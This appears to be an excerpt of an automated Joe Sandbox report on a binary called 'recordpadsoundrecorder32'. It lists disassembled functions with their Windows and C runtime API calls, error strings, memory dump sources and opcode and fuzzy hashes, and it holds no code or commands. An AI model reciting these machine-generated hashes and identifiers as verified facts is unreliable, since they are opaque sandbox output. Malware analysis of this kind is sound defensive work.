                                                                                        • Part of subcall function 0260A5CC: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 0260A5E0
                                                                                        • Part of subcall function 0260A5CC: __CxxThrowException@8.LIBCMT ref: 0260A5FF
                                                                                      Strings
                                                                                      • Day of month is not valid for year, xrefs: 026039AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: Day of month is not valid for year
                                                                                      • API String ID: 1404951899-1521898139
                                                                                      • Opcode ID: 5fcc7ae644ad72ba8f79e7680cc170df2e62fc01501c0b678a77c9d11bbf06e2
                                                                                      • Instruction ID: e5154327fde5bd2ffffd63088524da5f61896813da93175e0c45dd2b247a1d33
                                                                                      • Opcode Fuzzy Hash: 5fcc7ae644ad72ba8f79e7680cc170df2e62fc01501c0b678a77c9d11bbf06e2
                                                                                      • Instruction Fuzzy Hash: EA019E76810219AADB09EFA4C841AEFB779FF18710F40441AE804A3280EB704A59DFA9
                                                                                      Function 0260B0AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0260FAC5
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0260FADA
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                      • String ID: bad allocation
                                                                                      • API String ID: 4063778783-2104205924
                                                                                      • Opcode ID: 9a5ac043342942f05605d04e5c74007fe5a1e1b39b7362f3c5c093356ded5dad
                                                                                      • Instruction ID: cd01cf19897a1a3711a800925af96beb747bd5bda0b343cde0ee1b93a5a76f09
                                                                                      • Opcode Fuzzy Hash: 9a5ac043342942f05605d04e5c74007fe5a1e1b39b7362f3c5c093356ded5dad
                                                                                      • Instruction Fuzzy Hash: 0DF0AE7060035966DF0CEA98D995DAF73EDFB04314F404569A827D33C0EF70F9049595
                                                                                      Function 02603C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02603C1B
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 02603C30
                                                                                        • Part of subcall function 02612467: std::exception::exception.LIBCMT ref: 02612471
                                                                                        • Part of subcall function 0260A605: __EH_prolog.LIBCMT ref: 0260A60A
                                                                                        • Part of subcall function 0260A605: __CxxThrowException@8.LIBCMT ref: 0260A633
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 1300498068-3145022300
                                                                                      • Opcode ID: db302f92badd1af605c41cdae55097b6e42676a7d45b496e4401da73d2726dfa
                                                                                      • Instruction ID: afe6a8c1827db97760abe69b291034d990b6607164420dea96027de4791cbd25
                                                                                      • Opcode Fuzzy Hash: db302f92badd1af605c41cdae55097b6e42676a7d45b496e4401da73d2726dfa
                                                                                      • Instruction Fuzzy Hash: D5F02032900604CBCB0DDF88D580AEBB775EF01311F1040AEED069B380CBB29A8ACE94
                                                                                      Function 026038CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 026038D2
                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 026038F1
                                                                                        • Part of subcall function 02601410: std::exception::exception.LIBCMT ref: 02601428
                                                                                        • Part of subcall function 0260893A: _memmove.LIBCMT ref: 0260895A
                                                                                      Strings
                                                                                      • Year is out of valid range: 1400..10000, xrefs: 026038E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: Year is out of valid range: 1400..10000
                                                                                      • API String ID: 3258419250-2344417016
                                                                                      • Opcode ID: 46e284429d801a362f85643f179365eabc1a9a4532f1182d6259c809a9b13648
                                                                                      • Instruction ID: 0c7c7a9fccd43c1691effadc54faf54023249ddbe201511495eb01107c4c28da
                                                                                      • Opcode Fuzzy Hash: 46e284429d801a362f85643f179365eabc1a9a4532f1182d6259c809a9b13648
                                                                                      • Instruction Fuzzy Hash: 95E09272A405249BEB28EF9489557EEB765DB08710F40445EE406672C0DAB11958CF9A
                                                                                      Function 02603881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02603886
                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 026038A5
                                                                                        • Part of subcall function 02601410: std::exception::exception.LIBCMT ref: 02601428
                                                                                        • Part of subcall function 0260893A: _memmove.LIBCMT ref: 0260895A
                                                                                      Strings
                                                                                      • Day of month value is out of range 1..31, xrefs: 02603894
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: Day of month value is out of range 1..31
                                                                                      • API String ID: 3258419250-1361117730
                                                                                      • Opcode ID: 315f74f22b34dd85975f19d6eb3b976dbbd9a413e55f7165ac278ed331bae7e7
                                                                                      • Instruction ID: f0452aaf68929a8cddb7b92e42faf9c98792674742e566bf2b2d5b2e2e2e7d63
                                                                                      • Opcode Fuzzy Hash: 315f74f22b34dd85975f19d6eb3b976dbbd9a413e55f7165ac278ed331bae7e7
                                                                                      • Instruction Fuzzy Hash: E5E0D872E405249BDB2CFF94CD55BEEB775EB08710F40404EE806632C0DAB11958DF99
                                                                                      Function 02603919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260391E
                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 0260393D
                                                                                        • Part of subcall function 02601410: std::exception::exception.LIBCMT ref: 02601428
                                                                                        • Part of subcall function 0260893A: _memmove.LIBCMT ref: 0260895A
                                                                                      Strings
                                                                                      • Month number is out of range 1..12, xrefs: 0260392C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: Month number is out of range 1..12
                                                                                      • API String ID: 3258419250-4198407886
                                                                                      • Opcode ID: 10e03a1b031c3b602805be90c2ee9126f2dd6624c499186a9d57f411cdb26164
                                                                                      • Instruction ID: f2446adf76b196a65707743ac0abf600985774851553ce6c6336ebf6828b1040
                                                                                      • Opcode Fuzzy Hash: 10e03a1b031c3b602805be90c2ee9126f2dd6624c499186a9d57f411cdb26164
                                                                                      • Instruction Fuzzy Hash: 25E0D872E405249BD72CFF94CD557EEB775DB08710F40404EE806632C0DAB119588F9A
                                                                                      Function 026019C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • TlsAlloc.KERNEL32 ref: 026019CC
                                                                                      • GetLastError.KERNEL32 ref: 026019D9
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocErrorH_prologLast
                                                                                      • String ID: tss
                                                                                      • API String ID: 249634027-1638339373
                                                                                      • Opcode ID: e55b08bf0f07508ddf91e139711b50da83cd4b1ed2de6eab26782c94d7253597
                                                                                      • Instruction ID: cefd36bd7838609a2cdb061f610121554b630f1e3e4992daf32062ba4ed7f58b
                                                                                      • Opcode Fuzzy Hash: e55b08bf0f07508ddf91e139711b50da83cd4b1ed2de6eab26782c94d7253597
                                                                                      • Instruction Fuzzy Hash: 57E08671D456105BC3107B78E84848FFBA49A45235F118B6EFCBE832D0EA3059589BD6
                                                                                      Function 02603BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02603BD8
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 02603BED
                                                                                        • Part of subcall function 02612467: std::exception::exception.LIBCMT ref: 02612471
                                                                                        • Part of subcall function 0260A605: __EH_prolog.LIBCMT ref: 0260A60A
                                                                                        • Part of subcall function 0260A605: __CxxThrowException@8.LIBCMT ref: 0260A633
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 1300498068-3145022300
                                                                                      • Opcode ID: 97218788111c1c38423d3e9ac40d1b795ffd59b177d250fb0af216ba8350b2d5
                                                                                      • Instruction ID: 05bb741af36170c83c88f31a9ed37bcecd0243800dd7f43ac17ab1391b9a8621
                                                                                      • Opcode Fuzzy Hash: 97218788111c1c38423d3e9ac40d1b795ffd59b177d250fb0af216ba8350b2d5
                                                                                      • Instruction Fuzzy Hash: ADE09A70900208DBC718EF94D291BB9B771EB14305F4080ACD802573D0DB315949CE89
                                                                                      Function 00404AB0 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404AD8
                                                                                      • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B0C
                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B26
                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B3D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3499195154-0
                                                                                      • Opcode ID: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                      • Instruction ID: e332c3e7fbabb4a530177a7352d9393d0fbd82ec7ab2db7e11d44f19093e014a
                                                                                      • Opcode Fuzzy Hash: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                      • Instruction Fuzzy Hash: 611116B0201601DFC7219F19EE85E22BBB5FB84720711463AF292E65F0D771A845CF5C